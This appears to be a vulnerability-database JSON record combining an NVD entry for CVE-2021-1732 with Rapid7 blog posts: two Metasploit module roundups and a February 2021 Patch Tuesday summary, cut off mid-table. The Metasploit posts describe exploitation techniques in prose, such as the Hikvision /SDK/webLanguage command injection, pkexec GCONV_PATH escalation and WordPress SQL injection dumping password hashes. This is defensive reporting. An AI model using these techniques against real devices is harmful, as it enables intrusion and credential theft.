"2023-02-09T14:03:02", "description": "Windows Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1698.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-25T23:15:00", "type": "cve", "title": "CVE-2021-1732", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1698", "CVE-2021-1732"], "modified": "2022-04-12T18:41:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803"], "id": "CVE-2021-1732", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1732", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}], "rapid7blog": [{"lastseen": "2022-03-04T23:28:17", "description": "\n\nThis week\u2019s Metasploit Framework release brings us seven new modules.\n\n## IP Camera Exploitation\n\nRapid7\u2019s [Jacob Baines](<https://github.com/jbaines-r7>) was busy this week with two exploit modules that target IP cameras. The [first](<https://github.com/rapid7/metasploit-framework/pull/16190>) module exploits an authenticated file upload on Axis IP cameras. Due to lack of proper sanitization, an attacker can upload and install an `eap` application which, when executed, will grant the attacker `root` privileges on the device. This vulnerability, discovered by Baines in 2017, has yet to be patched.\n\nThe [second](<https://github.com/rapid7/metasploit-framework/pull/16204>) module exploits an unauthenticated command injection [vulnerability](<https://attackerkb.com/topics/mb8q72U2LT/cve-2021-36260?referrer=blog>) in a number of Hikvision IP cameras. A `PUT` request to the `/SDK/webLanguage` endpoint passes the contents of its request body\u2019s `<language>` tag to `snprintf()`, which then passes its resultant data to a call to `system()`, resulting in code execution with `root` privileges. This vulnerability has been [reported](<https://www.fortinet.com/blog/threat-research/mirai-based-botnet-moobot-targets-hikvision-vulnerability>) as exploited in the wild.\n\n## Privilege Escalation in pkexec\n\nCommunity contributor [RootUp](<https://github.com/RootUp>) submitted a [module](<https://github.com/rapid7/metasploit-framework/pull/16103>) that exploits a privilege escalation [vulnerability](<https://attackerkb.com/topics/JGooJTBk81/cve-2021-4034?referrer=blog>) in Polkit\u2019s `pkexec` utility, an SUID binary that is present on most major Linux distributions. Additionally, this vulnerability has likely existed in `pkexec` since [2009](<https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt>).\n\nAny user can escalate their privileges to `root` by exploiting an out-of-bounds read and write that exists in `pkexec`\u2019s executable path-finding logic. The logic always assumes that an argument is passed to `pkexec`, resulting in a read of the data that follows arguments in memory. Environment variables follow program arguments, so `pkexec` reads the first environment variable, resolves its full path, and replaces the environment variable with the full path. Leveraging the `GCONV_PATH` environment variable coerces `pkexec` into loading arbitrary libraries, leading to escalation of privileges.\n\n## New module content (7)\n\n * [WordPress Modern Events Calendar SQLi Scanner](<https://github.com/rapid7/metasploit-framework/pull/16131>) by Hacker5preme (Ron Jost), h00die, and red0xff, which exploits [CVE-2021-24946](<https://attackerkb.com/topics/afV2x8poTz/cve-2021-24946?referrer=blog>) \\- This exploits an unauthenticated SQL injection vulnerability in the Modern Events Calendar plugin for Wordpress.\n\n * [Wordpress Secure Copy Content Protection and Content Locking sccp_id Unauthenticated SQLi](<https://github.com/rapid7/metasploit-framework/pull/16182>) by Hacker5preme (Ron Jost), Krzysztof Zaj\u0105c (kazet), and h00die, which exploits [CVE-2021-24931](<https://attackerkb.com/topics/j2W7NOa1jw/cve-2021-24931?referrer=blog>) \\- A new module has been added to exploit CVE-2021-24931, an unauthenticated SQLi vulnerability in the `sccp_id` parameter of the `ays_sccp_results_export_file` AJAX action in Secure Copy Content Protection and Content Locking WordPress plugin versions before 2.8.2. Successful exploitation allows attackers to dump usernames and password hashes from the `wp_users` table which can then be cracked offline to gain valid login credentials for the affected WordPress installation.\n\n * [Axis IP Camera Application Upload](<https://github.com/rapid7/metasploit-framework/pull/16190>) by jbaines-r7 - The &quot;Apps'' feature in Axis IP cameras allow allows third party developers to upload and execute 'eap' applications on the device, however no validation is performed to ensure the application comes from a trusted source. This module takes advantage of this vulnerability to allow authenticated attackers to upload and execute malicious applications and gain RCE. Once the application has been installed and the shell has been obtained, the module will then automatically delete the malicious application. No CVE is assigned to this issue as a patch has not been released as of the time of writing.\n\n * [Hikvision IP Camera Unauthenticated Command Injection](<https://github.com/rapid7/metasploit-framework/pull/16204>) by Watchful_IP, bashis, and jbaines-r7, which exploits [CVE-2021-36260](<https://attackerkb.com/topics/mb8q72U2LT/cve-2021-36260?referrer=blog>) \\- This module exploits an unauthenticated command injection in a variety of Hikvision IP cameras (CVE-2021-36260). The module inserts a command into an XML payload used with an HTTP PUT request sent to the /SDK/webLanguage endpoint, resulting in command execution as the root user.\n\n * [Local Privilege Escalation in polkits pkexec](<https://github.com/rapid7/metasploit-framework/pull/16103>) by Andris Raugulis, Dhiraj Mishra, Qualys Security, and bwatters-r7, which exploits [CVE-2021-4034](<https://attackerkb.com/topics/JGooJTBk81/cve-2021-4034?referrer=blog>) \\- This adds an LPE exploit for CVE-2021-4034 which leverages an out-of-bounds read and write in polkit's pkexec utility. It also adds support to Metasploit for generating Linux SO library payloads for the AARCH64 architecture.\n\n * [Firefox MCallGetProperty Write Side Effects Use After Free Exploit](<https://github.com/rapid7/metasploit-framework/pull/16185>) by 360 ESG Vulnerability Research Institute, maxpl0it, and timwr, which exploits [CVE-2020-26950](<https://attackerkb.com/topics/NuuSBUKQIb/cve-2020-26950?referrer=blog>) \\- This adds a module for CVE-2020-26950, a use after free browser exploit targeting Firefox and Thunderbird.\n\n * [#16202](<https://github.com/rapid7/metasploit-framework/pull/16202>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This adds an exploit for [CVE-2022-21882](<https://github.com/advisories/GHSA-m3vx-53cf-jqv4>) which is a patch bypass for [CVE-2021-1732](<https://attackerkb.com/topics/7eGGM4Xknz/cve-2021-1732?referrer=blog>). It updates and combines both techniques into a single mega-exploit module that will use the updated technique as necessary. No configuration is necessary outside of the SESSION and payload datastore options.\n\n## Bugs fixed\n\n * [#16228](<https://github.com/rapid7/metasploit-framework/pull/16228>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This fixes a bug where the framework failed to check if a payload would fit in the space defined by an exploit if the payload was not encoded.\n * [#16235](<https://github.com/rapid7/metasploit-framework/pull/16235>) from [bcoles](<https://github.com/bcoles>) \\- This change fixes an issue with APK injection when in some configurations an invalid apktool version string would cause injection to fail.\n * [#16251](<https://github.com/rapid7/metasploit-framework/pull/16251>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This fixes an error when executing commands using the Python Meterpreter where not all results were returned to msfconsole.\n * [#16254](<https://github.com/rapid7/metasploit-framework/pull/16254>) from [heyder](<https://github.com/heyder>) \\- This fixes an issue in the Shodan search module where recent changes to randomize the user agent were causing the results returned to the module to be in an unexpected format.\n * [#16255](<https://github.com/rapid7/metasploit-framework/pull/16255>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This fixes a parsing issue with kiwi_cmd arguments which contained spaces, such as `kiwi_cmd 'base64 /in:off /out:off'`.\n * [#16257](<https://github.com/rapid7/metasploit-framework/pull/16257>) from [bcoles](<https://github.com/bcoles>) \\- This change adds a warning when a user tries to inject the Android payload into an APK using an older version of apktool.\n * [#16264](<https://github.com/rapid7/metasploit-framework/pull/16264>) from [bwatters-r7](<https://github.com/bwatters-r7>) \\- This fixes a crash when attempting to create create local module documentation with the `info -d` command when the provided GitHub credentials were invalid.\n * [#16266](<https://github.com/rapid7/metasploit-framework/pull/16266>) from [smashery](<https://github.com/smashery>) \\- This fixes bugs in how `msfconsole` tab-completes directory paths.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.31...6.1.32](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-02-24T11%3A00%3A46-06%3A00..2022-03-03T12%3A00%3A18-05%3A00%22>)\n * [Full diff 6.1.31...6.1.32](<https://github.com/rapid7/metasploit-framework/compare/6.1.31...6.1.32>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-04T21:52:42", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-26950", "CVE-2021-1732", "CVE-2021-24931", "CVE-2021-24946", "CVE-2021-36260", "CVE-2021-4034", "CVE-2022-21882"], "modified": "2022-03-04T21:52:42", "id": "RAPID7BLOG:4BFD931715758C7B7E2711A580BFEA5E", "href": "https://blog.rapid7.com/2022/03/04/metasploit-wrap-up-150/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-26T18:52:42", "description": "## ProxyLogon\n\n\n\nMore Microsoft news this week!\n\nFirstly, a big thank you to community contributors [GreyOrder](<https://github.com/GreyOrder>), [Orange Tsai](<https://github.com/orangetw>), and [mekhalleh](<https://github.com/mekhalleh>) (RAMELLA S\u00e9bastien), who added three new [modules](<https://github.com/rapid7/metasploit-framework/pull/14860>) that allow an attacker to bypass authentication and impersonate an administrative user ([CVE-2021-26855](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855?referrer=blog>)) on vulnerable versions of Microsoft Exchange Server. By chaining this bug with another post-auth arbitrary-file-write vulnerability, code execution can be achieved on a vulnerable target ([CVE-2021-27065](<https://attackerkb.com/topics/lLMDUaeKSn/cve-2021-27065?referrer=blog>)), allwoing an unauthenticated attacker to execute arbitrary commands.\n\nThis vulnerability affects (Exchange 2013 Versions &lt; 15.00.1497.012, Exchange 2016 CU18 &lt; 15.01.2106.013, Exchange 2016 CU19 &lt; 15.01.2176.009, Exchange 2019 CU7 &lt; 15.02.0721.013, Exchange 2019 CU8 &lt; 15.02.0792.010)\n\n## Advantech iView\n\nGreat work by our very own [wvu-r7](<https://github.com/wvu-r7>) and [zeroSteiner](<https://github.com/zeroSteiner>), who added a new exploit [module](<https://github.com/rapid7/metasploit-framework/pull/14920>) for [CVE-2021-22652](<https://attackerkb.com/topics/A4sKN6BuXQ/cve-2021-22652?referrer=blog>).\n\nThis module exploits an unauthenticated configuration change vulnerability combined with an unauthenticated file write primitive, leading to an arbitrary file write that allows for remote code execution as the user running iView, which is typically NT AUTHORITY\\SYSTEM.\n\nThe exploit functions by first modifying the `EXPORTPATH` to be a writable path in the webroot. An export function is then leveraged to write JSP content into the previously configured path, which can then be requested to trigger the execution of an OS command within the context of the application. Once completed, the original configuration value is restored.\n\n## FortiLogger\n\nNice work by community contributor [erberkan](<https://github.com/erberkan>), who added an exploit [module](<https://github.com/rapid7/metasploit-framework/pull/14830>) for [CVE-2021-3378](<https://attackerkb.com/topics/eTyHVvBtiM/cve-2021-3378?referrer=blog>).\n\nThis module exploits an arbitrary file upload via an unauthenticated POST request to the &quot;/Config/SaveUploadedHotspotLogoFile&quot; upload path for hotspot settings of FortiLogger 4.4.2.2.\n\nFortiLogger is a web-based logging and reporting software designed specifically for FortiGate firewalls, running on Windows operating systems. It contains features such as instant status tracking, logging, search / filtering, reporting and hotspot.\n\n## New Modules (7)\n\n * [Microsoft Exchange ProxyLogon](<https://github.com/rapid7/metasploit-framework/pull/14860>) by GreyOrder, Orange Tsai, and mekhalleh (RAMELLA S\u00e9bastien), which adds 3 modules that leverage two Microsoft Exchange Server vulnerabilities patched in March out-of-band security updates:\n\n * A scanner module that checks if the target is vulnerable to a Server-Side Request Forgery (SSRF) identified as [CVE-2021-26855](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855?referrer=blog>).\n * An auxiliary module that dumps the mailboxes for a given email address, including emails, attachments and contact information. This module leverages the same SSRF vulnerability identified as [CVE-2021-26855](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855?referrer=blog>).\n * An exploit module that exploits an unauthenticated Remote Code Execution on Microsoft Exchange Server. This allows execution of arbitrary commands as the SYSTEM user, leveraging the same SSRF vulnerability identified as [CVE-2021-26855](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855?referrer=blog>) and also a post-auth arbitrary-file-write vulnerability identified as [CVE-2021-27065](<https://attackerkb.com/topics/lLMDUaeKSn/cve-2021-27065?referrer=blog>).\n * [VMware View Planner Unauthenticated Log File Upload RCE](<https://github.com/rapid7/metasploit-framework/pull/14875>) by wvu, Grant Willcox, and Mikhail Klyuchnikov, exploiting [CVE-2021-21978](<https://attackerkb.com/topics/84gfOVMN35/cve-2021-21978?referrer=blog>), an arbitrary file upload vulnerability within VMWare View Planner Harness prior to 4.6 Security Patch 1.\n\n * [Advantech iView Unauthenticated Remote Code Execution](<https://github.com/rapid7/metasploit-framework/pull/14920>) by wvu and Spencer McIntyre, which exploits [CVE-2021-22652](<https://attackerkb.com/topics/A4sKN6BuXQ/cve-2021-22652?referrer=blog>), allowing an unauthenticated user to make configuration changes on a remote Advantech iView server. The vulnerability can be leveraged to obtain remote code execution within the context of the server application (which runs as SYSTEM by default).\n\n * [FortiLogger Arbitrary File Upload Exploit](<https://github.com/rapid7/metasploit-framework/pull/14830>) by Berkan Er, which exploits [CVE-2021-3378](<https://attackerkb.com/topics/eTyHVvBtiM/cve-2021-3378?referrer=blog>), an unauthenticated arbitrary file upload vulnerability in FortiLogger 4.4.2.2.\n\n * [Win32k ConsoleControl Offset Confusion](<https://github.com/rapid7/metasploit-framework/pull/14907>) by BITTER APT, JinQuan, KaLendsi, LiHao, MaDongZe, Spencer McIntyre, and TuXiaoYi, which exploits [CVE-2021-1732](<https://attackerkb.com/topics/7eGGM4Xknz/cve-2021-1732?referrer=blog>), an LPE vulnerability in win32k.\n\n## Enhancements and features\n\n * [#14878](<https://github.com/rapid7/metasploit-framework/pull/14878>) from [jmartin-r7](<https://github.com/jmartin-r7>) The recently introduced Zeitwerk loader is now wrapped and retained in a more flexible way. Additionally `lib/msf_autoload.rb` is now marked as a singleton class to ensure that only one instance of the loader can exist at any one time. The loading process has also been broken down into separate methods to allow for additional tweaking, extension, and suppression as needed.\n\n * [#14893](<https://github.com/rapid7/metasploit-framework/pull/14893>) from [archcloudlabs](<https://github.com/archcloudlabs>) `avast_memory_dump.rb` has been updated with additional paths to check for the `avdump.exe` utility, which should help Metasploit users in cases where the tool is bundled in with other Avast software besides the standard AV solution.\n\n * [#14917](<https://github.com/rapid7/metasploit-framework/pull/14917>) from [pingport80](<https://github.com/pingport80>) The `search` command has been updated to add in the `-s` and `-r` flags. The `-s` flag allows one to search by rank, disclosure date, module name, module type, or if the module implements a check method or not. The results will be ordered in ascending order, however users can show the results in descending order by using the `-r` flag.\n\n * [#14927](<https://github.com/rapid7/metasploit-framework/pull/14927>) from [pingport80](<https://github.com/pingport80>) The Ruby scripts under `tools/exploits/*` have been rewritten so that they capture signals and handle them gracefully instead of stack tracing.\n\n * [#14938](<https://github.com/rapid7/metasploit-framework/pull/14938>) from [adfoster-r7](<https://github.com/adfoster-r7>) The `time` command has been added to `msfconsole` to allow developers to time how long certain commands take to execute.\n\n## Bugs Fixed\n\n * [#14430](<https://github.com/rapid7/metasploit-framework/pull/14430>) from [cn-kali-team](<https://github.com/cn-kali-team>) Provides feedback to the user when attempting to use UUID tracking without a DB connection.\n\n * [#14815](<https://github.com/rapid7/metasploit-framework/pull/14815>) from [cgranleese-r7](<https://github.com/cgranleese-r7>) Replaces deprecated uses of `::Rex:Socket.gethostbyname` in favor of the newer `::Rex::Socket.getaddress` functionality in preparation of Ruby 3 support.\n\n * [#14844](<https://github.com/rapid7/metasploit-framework/pull/14844>) from [dwelch-r7](<https://github.com/dwelch-r7>) This moves the on_session_open event until after the session has been bootstrapped which is necessary to expose some functionality required by plugins such as auto_add_route.\n\n * [#14879](<https://github.com/rapid7/metasploit-framework/pull/14879>) from [cgranleese-r7](<https://github.com/cgranleese-r7>) The `ssh_login_pubkey.rb` module has been updated to support specifying the path to a private key for the `KEY_PATH` option, and to improve error handling in several places to reduce stack traces and make error messages are more understandable.\n\n * [#14896](<https://github.com/rapid7/metasploit-framework/pull/14896>) from [AlanFoster](<https://github.com/AlanFoster>) The `apache_activemq_upload_jsp` exploit has been updated so that it can successfully exploit vulnerable systems running Java 8. Additionally, module documentation has been added.\n\n * [#14910](<https://github.com/rapid7/metasploit-framework/pull/14910>) from [friedrico](<https://github.com/friedrico>) `filezilla_client_cred.rb` has been updated to prevent it from falsely identifying strings as being Base64 encoded when they are not. The new code now checks that the string is marked as being Base64 encoded before attempting to decode it.\n\n * [#14912](<https://github.com/rapid7/metasploit-framework/pull/14912>) from [bcoles](<https://github.com/bcoles>) The `netgear_r6700_pass_reset.rb` module has been updated to fix a typo that could occasionally cause the `check` function to fail, and to fix a stack trace caused by calling a method on a `nil` object.\n\n * [#14930](<https://github.com/rapid7/metasploit-framework/pull/14930>) from [adfoster-r7](<https://github.com/adfoster-r7>) This fixes a bug where the highlighting in msfconsole's search command would break when the search term was certain single letter queries.\n\n * [#14934](<https://github.com/rapid7/metasploit-framework/pull/14934>) from [timwr](<https://github.com/timwr>) A bug has been addressed whereby the `download` command in Meterpreter, if run on a directory containing UTF-8 characters, would result in an error. This has been resolved by enforcing the correct encoding.\n\n * [#14941](<https://github.com/rapid7/metasploit-framework/pull/14941>) from [dwelch-r7](<https://github.com/dwelch-r7>) The `smb_relay` module has been updated to force the use of `Rex::Proto::SMB::Client`, which fixes several issues that were being encountered due to the module accidentally using `ruby_smb` vs `Rex::Proto::SMB::Client`.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from\n\nGitHub:\n\n * [Pull Requests 6.0.36...6.0.37](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-03-18T09%3A30%3A28-05%3A00..2021-03-25T11%3A07%3A15-05%3A00%22>)\n * [Full diff 6.0.36...6.0.37](<https://github.com/rapid7/metasploit-framework/compare/6.0.36...6.0.37>) \nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest.\n\nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-03-26T17:36:13", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1732", "CVE-2021-21978", "CVE-2021-22652", "CVE-2021-26855", "CVE-2021-27065", "CVE-2021-3378"], "modified": "2021-03-26T17:36:13", "id": "RAPID7BLOG:D435EE51E7D9443C43ADC937A046683C", "href": "https://blog.rapid7.com/2021/03/26/metasploit-wrap-up-104/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-10T00:48:57", "description": "\n\nThe second Patch Tuesday of 2021 is relatively light on the vulnerability count, with 64 CVEs being addressed across the majority of Microsoft\u2019s product families. Despite that, there\u2019s still plenty to discuss this month.\n\n### Vulnerability Breakdown by Software Family\n\nFamily | Vulnerability Count \n---|--- \nWindows | 28 \nESU | 14 \nMicrosoft Office | 11 \nBrowser | 9 \nDeveloper Tools | 8 \nMicrosoft Dynamics | 2 \nExchange Server | 2 \nAzure | 2 \nSystem Center | 2 \n \n### Exploited and Publicly Disclosed Vulnerabilities\n\nOne zero-day was announced: [CVE-2021-1732](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1732>) is a privilege elevation vulnerability affecting the Win32k component of Windows 10 and Windows Server 2019, reported to be exploited in the wild. Four vulnerabilities have been previously disclosed: [CVE-2021-1727](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1727>), a privilege elevation vulnerability in Windows Installer, affecting all supported versions of Windows; [CVE-2021-24098](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24098>), which is a denial of service (DoS) affecting Windows 10 and Server 2019; [CVE-2021-24106](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24106>), an information disclosure vulnerability affecting DirectX in Windows 10 and Server 2019; and [CVE-2021-26701](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26701>), an RCE in .NET Core.\n\n### Vulnerabilities in Windows TCP/IP\n\nMicrosoft also disclosed a set of [three serious vulnerabilities](<https://msrc-blog.microsoft.com/2021/02/09/multiple-security-updates-affecting-tcp-ip/>) affecting the TCP/IP networking stack in all supported versions of Windows. Two of these ([CVE-2021-24074](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24074>) and [CVE-2021-24094](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24094>)) carry a base CVSSv3 score of 9.8 and could allow Remote Code Execution (RCE). [CVE-2021-24094](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24094>) is specific to IPv6 link-local addresses, meaning it isn\u2019t exploitable over the public internet. [CVE-2021-24074](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24074>), however, does not have this limitation. The third, [CVE-2021-24086](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24086>), is a DoS vulnerability that could allow an attacker to trigger a \u201cblue screen of death\u201d on any Windows system that is directly exposed to the internet, using only a small amount of network traffic. The RCE exploits are probably not a threat in the short term, due to the complexity of the vulnerabilities, but DoS attacks are expected to be seen much more quickly. Windows systems should be patched as soon as possible to protect against these.\n\nIn the event a patch cannot be applied immediately, such as on systems that cannot be rebooted, Microsoft has published mitigation guidance that will protect against exploitation of the TCP/IP vulnerabilities. Depending on the exposure of an asset, IPv4 Source Routing should be disabled via a Group Policy or a Netsh command, and IPv6 packet reassembly should be disabled via a separate Netsh command. IPv4 Source Routing requests and IPv6 fragments can also be blocked load balancers, firewalls, or other edge devices to mitigate these issues.\n\n### Zerologon Update\n\nBack in August, 2020, Microsoft addressed a critical remote code vulnerability (CVE-2020-1472) affecting the Netlogon protocol (MS-NRPC), a.k.a. \u201c[Zerologon](<https://blog.rapid7.com/2020/09/14/cve-2020-1472-zerologon-critical-privilege-escalation/>)\u201d. In October, Microsoft [noted](<https://msrc-blog.microsoft.com/2020/10/29/attacks-exploiting-netlogon-vulnerability-cve-2020-1472/>) that attacks which exploit this weakness have been seen in the wild. On January 14, 2021, they [reminded](<https://msrc-blog.microsoft.com/2021/01/14/netlogon-domain-controller-enforcement-mode-is-enabled-by-default-beginning-with-the-february-9-2021-security-update-related-to-cve-2020-1472/>) organizations that the February 2021 security update bundle will also be enabling \u201cDomain Controller enforcement mode\" by default to fully address this weakness. Any system that tries to make an insecure Netlogon connection will be denied access. Any business-critical process that relies on these insecure connections will cease to function. Rapid7 encourages all organizations to [heed the detailed guidance](<https://support.microsoft.com/en-us/topic/how-to-manage-the-changes-in-netlogon-secure-channel-connections-associated-with-cve-2020-1472-f7e8cc17-0309-1d6a-304e-5ba73cd1a11e#bkmk_detectingnon_compliant>) before applying the latest updates to ensure continued business process continuity.\n\n### Adobe\n\nMost important amongst the [six security advisories](<https://helpx.adobe.com/security.html>) published by Adobe today is [APSB21-09](<https://helpx.adobe.com/security/products/acrobat/apsb21-09.html>), detailing 23 CVEs affecting Adobe Acrobat and Reader. Six of these are rated Critical and allow Arbitrary Code Execution, and one of which (CVE-2021-21017), has been seen exploited in the wild in attacks targeting Adobe Reader users on Windows.\n\n### Summary Tables\n\n#### Azure Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-24109](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24109>) | Microsoft Azure Kubernetes Service Elevation of Privilege Vulnerability | No | No | 6.8 | Yes \n[CVE-2021-24087](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24087>) | Azure IoT CLI extension Elevation of Privilege Vulnerability | No | No | 7 | Yes \n \n#### Browser Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-24100](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24100>) | Microsoft Edge for Android Information Disclosure Vulnerability | No | No | 5 | Yes \n[CVE-2021-24113](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24113>) | Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability | No | No | 4.6 | Yes \n[CVE-2021-21148](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21148>) | Chromium CVE-2021-21148: Heap buffer overflow in V8 | N/A | N/A | nan | Yes \n[CVE-2021-21147](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21147>) | Chromium CVE-2021-21147: Inappropriate implementation in Skia | N/A | N/A | nan | Yes \n[CVE-2021-21146](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21146>) | Chromium CVE-2021-21146: Use after free in Navigation | N/A | N/A | nan | Yes \n[CVE-2021-21145](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21145>) | Chromium CVE-2021-21145: Use after free in Fonts | N/A | N/A | nan | Yes \n[CVE-2021-21144](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21144>) | Chromium CVE-2021-21144: Heap buffer overflow in Tab Groups | N/A | N/A | nan | Yes \n[CVE-2021-21143](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21143>) | Chromium CVE-2021-21143: Heap buffer overflow in Extensions | N/A | N/A | nan | Yes \n[CVE-2021-21142](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21142>) | Chromium CVE-2021-21142: Use after free in Payments | N/A | N/A | nan | Yes \n \n#### Developer Tools Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-26700](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26700>) | Visual Studio Code npm-script Extension Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-1639](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1639>) | Visual Studio Code Remote Code Execution Vulnerability | No | No | 7 | No \n[CVE-2021-1733](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1733>) | Sysinternals 